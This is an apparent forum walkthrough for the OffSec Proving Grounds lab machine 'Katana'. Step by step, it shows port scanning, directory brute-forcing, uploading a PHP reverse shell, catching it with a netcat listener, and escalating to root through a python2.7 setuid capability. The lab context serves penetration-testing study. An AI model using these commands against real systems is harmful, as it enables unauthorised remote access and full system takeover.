OffsecPG - Katana

Katana Machine - Walkthrough

1. Reconnaissance

Run Nmap scan to discover open ports and services.

nmap -sC -sV -p- [TARGET_IP]

Notable open ports:

  • FTP (port 21)

  • SSH (port 22)

  • HTTP (port 80)

  • Samba (port 139, 445)

  • LiteSpeed HTTP (port 8088)

  • Nginx HTTP (port 8715)

2. Exploring HTTP Services

Start by browsing port 80. No useful information found.

Proceed with brute-forcing hidden directories using Gobuster.

gobuster dir -k -u http://[TARGET_IP]:8088/ -w /usr/share/wordlists/dirb/common.txt -x html,php

Interesting directories:

  • /upload.html: File upload page.

3. Gaining Foothold

Upload a PHP reverse shell using pentestmonkey’s script.

Once uploaded, check the redirection on port 8715 for the shell file.

Start a netcat listener and trigger the reverse shell.

nc -nlvp 4444

curl http://[TARGET_IP]:8715/katana_shell.php

Once connected, upgrade to a stable shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm

First flag: /var/www/local.txt.

4. Privilege Escalation

Check for SUID binaries using getcap.

/sbin/getcap -r / 2>/dev/null

Found that Python 2.7 has cap_setuid+ep.

Use GTFOBins technique to escalate privileges:

python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now you have root access. Retrieve the final flag:

cat /root/proof.txt

5. Flags

  • User flag: /var/www/local.txt

  • Root flag: /root/proof.txt

1 Like